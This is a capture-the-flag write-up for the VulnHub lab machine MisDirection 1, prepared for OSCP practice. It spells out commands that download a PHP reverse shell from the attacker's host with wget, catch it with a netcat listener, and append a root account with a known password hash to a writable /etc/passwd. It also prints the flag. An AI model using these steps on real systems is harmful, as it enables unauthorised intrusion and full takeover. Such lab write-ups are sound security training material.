Vulnhub: MisDirection 1 Writeup (OSCP PREP) [by dollarboysushil]
data:image/s3,"s3://crabby-images/2d70c/2d70cf125c141efb5e0fa8e7e4c5270c2103f758" alt=""
Link to MisDirection; https://www.vulnhub.com/entry/misdirection-1,371/
Description
The purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.
Level: Beginner
AIM
Get User and Root flag
Enumeration
data:image/s3,"s3://crabby-images/ab0af/ab0af1bc3a38f9e70a166fb5606593e6099a39dc" alt=""
nmap -sC -sV -p- 192.168.217.136
-sC
for default scripts,-sV
for version enumeration and -p-
to scan all
In the result we can see services running
port 22 ssh
port 80 http
port 8080 http
data:image/s3,"s3://crabby-images/884e6/884e6e7e5736af1aead132ad2ea2e7feb6b0d7e0" alt=""
On visiting the ip, we have a simple http website. Didn’t found much in this website. From the nmap scan we know we Apache http website running in port 8080.
data:image/s3,"s3://crabby-images/8bd8b/8bd8ba56f64c829d492e94bccd3012afdfa6ef9c" alt=""
Indeed we have simple http website on port 8080.
data:image/s3,"s3://crabby-images/a929d/a929d637a40fc8133bc8156f7e1e82e0ae7effe4" alt=""
Using gobuster to bruteforce hidden directory reveals some interesting directories.
data:image/s3,"s3://crabby-images/574f1/574f1d17a478606886ae88f37360c5cdff6008b0" alt=""
under /wordpress
directory we have a wordpress site.
data:image/s3,"s3://crabby-images/b2f68/b2f687ee6e9f6d14b510753606e5c616c09cd7e5" alt=""
Then I ran wpscan
to scan for any vulnerabilities in this wordpress site. I also used — enumeration u
option to enumerate of users.
data:image/s3,"s3://crabby-images/70c88/70c881f5e9ee274d0b23a6b5043c9d1806df4525" alt=""
It found one user admin
, nothing much.
Lets continue exploring the directory found from gobuster earlier.
data:image/s3,"s3://crabby-images/287cf/287cfd103dd81d3db45520f1224a9e72fe0617a5" alt=""
Among other directory found, the interesting one is /debug
where we have shell access as www-data
. Here we can execute commands
Exploitation
We are going to upload a php reverse shell, and get ourself shell.
I will be using phpreverseshell from pentestmonkey
From this github, download php-reverse-shell.php
data:image/s3,"s3://crabby-images/8a6e4/8a6e418193bca301356038db671e201151971095" alt=""
on your machine, open the php script and change the $ip
to your attacker machine’s ip. Changing $port
is optional, we will need this later.
Now we have to upload this php script into victim machine. For which we will create simple http server using python
On you php script folder
data:image/s3,"s3://crabby-images/808bd/808bd4cd5a786ded06ad16bf16569fbcad31ef35" alt=""
Launch http server using python -m http.server 8000
here 8000 is port.
data:image/s3,"s3://crabby-images/3aa56/3aa5612afcca9e032f510dd6a409395d1fbd2d49" alt=""
On victim ;
upgrade shell using python -c ‘import pty;pty.spawn(“/bin/bash”)’
Then go to /tmp
directory.
Now to download the php script from our machine to victim. USE
wget {yourmachineip}:{port-used-during python server creation}/{filename}
in my case the command will look like
wget 192.168.217.128:8000/php-reverse-shell.php
data:image/s3,"s3://crabby-images/101c0/101c004e459bd11388e56fa45eb314538730ff69" alt=""
Before running the script , make sure to setup netcat listner in your attacker machine.
nc -lnvp 443
here 443 is the port used in php script file
data:image/s3,"s3://crabby-images/2ad66/2ad669bf42a1ffb52644858cd33c01f6167e7955" alt=""
First make the script executable using chmod +x php-reverse-shell.php
and then run the script using php php-reverse-shell.php
data:image/s3,"s3://crabby-images/81fbc/81fbc8583ed17b1dae807110d045d3cbfc2fd495" alt=""
And we have shell as www-data
Privilege Escalation
data:image/s3,"s3://crabby-images/301e1/301e194f61bbab62d2540077350779b2548dafec" alt=""
using command sudo -l
reveals we can run /bin/bash
as brexit
data:image/s3,"s3://crabby-images/cd0c4/cd0c4da1fea3e5242a0fa20aecdf105697c689a8" alt=""
lets run /bin/bash as brexit using command
sudo -u brexit /bin/bash
data:image/s3,"s3://crabby-images/16e8d/16e8d875216412a53ebc5cde637029281c6bf35d" alt=""
Looking inside the home directory of brexit reveals us our first flag user.txt
data:image/s3,"s3://crabby-images/0487a/0487a32f428c4d85ca7d14b396a6f39ddf44abb0" alt=""
First I tried to read the file /etc/shadow
but permission was denied.
A shadow password file, also known as /etc/shadow, is a system file in Linux that stores encrypted user passwords
data:image/s3,"s3://crabby-images/9eb4b/9eb4b786ec10fb9a31e0f9c7755a02779c9506fa" alt=""
I was able to read the content of /etc/passwd
data:image/s3,"s3://crabby-images/7eb06/7eb065064a96abd738de0e6c9bf83e27ddb9391a" alt=""
looking at the permission of /etc/passwd
reveals we can read, write and execute this file.
The/etc/passwd file is a plain text file with information for all user accounts. It includes a list of user accounts on the system, as well as details such as user ID, group ID, home directory, and default shell.
SO we can use this to get ourself root access.
Previously users’s encrypted passwords was stored inside /etc/passwd
, but it was changed and not the users password are stored inside /etc/shadow
In /etc/passwd
we can see x
after username, it was the place where users hashed password was stored.
If the password hash is stored in the /etc/passwd
file, then it takes 1st priority over the one in the /etc/shadow
.
So we will make a new user named; dollarboysushil and add its hashed password inside the passwd file. and we will give this user root access
data:image/s3,"s3://crabby-images/c3f70/c3f70f9456249e734c3925e14717813daaab2d3e" alt=""
we will use ; username = dollarboysushil and password = NewPass
So hash this password using command openssl passwd NewPass
and add new user inside /etc/passwd
file using command
echo 'dollarboysushil:$1$YFft94SI$uBh/UAHLkbzZknMmgtceG1:0:0:root:/root:/bin/bash' >> d/etc/passwd
data:image/s3,"s3://crabby-images/57d30/57d30708f5edf45f4ef3ffe5e1cbaf6fe7592a3f" alt=""
data:image/s3,"s3://crabby-images/6ab85/6ab851b10c8618c270bb6ad5088e8532cda1e5f3" alt=""
looking into /etc/passwd
reveals we have successfully added new entry
Now we can change user to the one we just added
data:image/s3,"s3://crabby-images/40141/40141b9ad4d17a13e329e7c7b3c0db721d2ff587" alt=""
And we are root.
data:image/s3,"s3://crabby-images/508ea/508eaa61bedfd019cdde4518d1c2deb6fabef5ad" alt=""
We can now read the final flag root.txt
. Thus completing the machine
0d2c6222bfdd3701e0fa12a9a9dc9c8c
For any correction / query /suggestion contact on
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil